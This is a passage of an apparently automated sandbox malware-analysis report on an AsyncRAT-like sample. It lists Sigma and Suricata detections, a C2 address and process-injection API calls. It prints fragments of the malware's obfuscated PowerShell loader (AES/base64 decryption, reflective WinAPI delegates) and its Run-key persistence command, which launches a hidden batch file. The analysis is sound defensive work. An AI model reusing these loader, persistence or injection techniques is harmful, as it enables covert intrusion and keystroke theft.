(blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); , CommandLine: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'ns'+[Char](97)+''+[Char](102)+

Sigma detected: Potential WinAPI Calls Via CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'ns'+[Char](97)+''+[Char](102)+

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7080, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 4788, ProcessName: schtasks.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7720, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7720, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2384, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1 (2).cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 7720, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T14:55:20.913610+0200	2035595	1	Domain Observed Used for C2 Detected	154.216.20.132	6969	192.168.2.8	63301	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.1% probability

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 37_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

37_2_00401000

Source: unknown

HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.8:63304 version: TLS 1.2

Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B44490D894 FindFirstFileExW,	20_2_000001B44490D894
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B44490DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	20_2_000001B44490DA18
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_000001C0401CDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401CD894 FindFirstFileExW,	40_2_000001C0401CD894
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	40_2_000001C0401FDA18
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_000001C0401FD894 FindFirstFileExW,	40_2_000001C0401FD894
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99175D894 FindFirstFileExW,	41_2_000002E99175D894
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99175DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002E99175DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99178D894 FindFirstFileExW,	41_2_000002E99178D894
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E99178DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	41_2_000002E99178DA18
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709DD894 FindFirstFileExW,	43_2_00000158709DD894
Source: C:\Windows\System32\svchost.exe	Code function: 43_2_00000158709DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	43_2_00000158709DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F066D894 FindFirstFileExW,	45_2_000002A3F066D894
Source: C:\Windows\System32\svchost.exe	Code function: 45_2_000002A3F066DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_000002A3F066DA18

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.8:63301

Source: global traffic

TCP traffic: 192.168.2.8:63301 -> 154.216.20.132:6969

Source: Joe Sandbox View	IP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox View	IP Address: 195.201.57.90 195.201.57.90

Source: Joe Sandbox View

ASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipwho.is

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: azure-winsecure.com
Source: global traffic	DNS traffic detected: DNS query: ipwho.is

Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000008.00000002.1695203762.00000201CD3A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftA
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: powershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E520000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000002A.00000002.2722818300.00000213BD59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2719554200.00000213BD4EC000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000000.2198040001.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2710922540.00000213BD400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E03000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000002A.00000002.2699722963.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2212213314.000001A38E311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000023.00000002.2175061332.0000000004E19000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2175061332.0000000004E28000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.1695772455.00000201CF041000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6xGA
Source: powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000026.00000002.2212213314.000001A38E53D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000026.00000002.2212213314.000001A38F45A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.1940456822.00000201DF0CC000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2423655674.000001A39E37A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 63304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63304

Source: unknown

HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.8:63304 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7720, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10DF98 NtUnmapViewOfSection,	38_2_00007FFB4B10DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10E0DA NtWriteVirtualMemory,	38_2_00007FFB4B10E0DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10E102 NtSetContextThread,	38_2_00007FFB4B10E102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10E122 NtResumeThread,	38_2_00007FFB4B10E122
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B110FE4 NtResumeThread,	38_2_00007FFB4B110FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B110C5D NtWriteVirtualMemory,	38_2_00007FFB4B110C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10E078 NtUnmapViewOfSection,	38_2_00007FFB4B10E078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B110F20 NtSetContextThread,	38_2_00007FFB4B110F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B110A3E NtUnmapViewOfSection,	38_2_00007FFB4B110A3E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10E112 NtSetContextThread,	38_2_00007FFB4B10E112
Source: C:\Windows\System32\dllhost.exe	Code function: 40_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,	40_2_0000000140001868
Source: C:\Windows\System32\winlogon.exe	Code function: 41_2_000002E991752C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	41_2_000002E991752C80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\$rbx-1ktMxXBv

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_sbacdivv.ibu.ps1

Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000001B4448A23F0	20_3_000001B4448A23F0
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000001B4448ACC94	20_3_000001B4448ACC94
Source: C:\Windows\System32\conhost.exe	Code function: 20_3_000001B4448ACE18	20_3_000001B4448ACE18
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B444902FF0	20_2_000001B444902FF0
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B44490D894	20_2_000001B44490D894
Source: C:\Windows\System32\conhost.exe	Code function: 20_2_000001B44490DA18	20_2_000001B44490DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10F63E	38_2_00007FFB4B10F63E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10DD58	38_2_00007FFB4B10DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10640D	38_2_00007FFB4B10640D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B104C4D	38_2_00007FFB4B104C4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10DC35	38_2_00007FFB4B10DC35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B103AF1	38_2_00007FFB4B103AF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10E329	38_2_00007FFB4B10E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10FDE9	38_2_00007FFB4B10FDE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 38_2_00007FFB4B10F659	38_2_00007FFB4B10F659
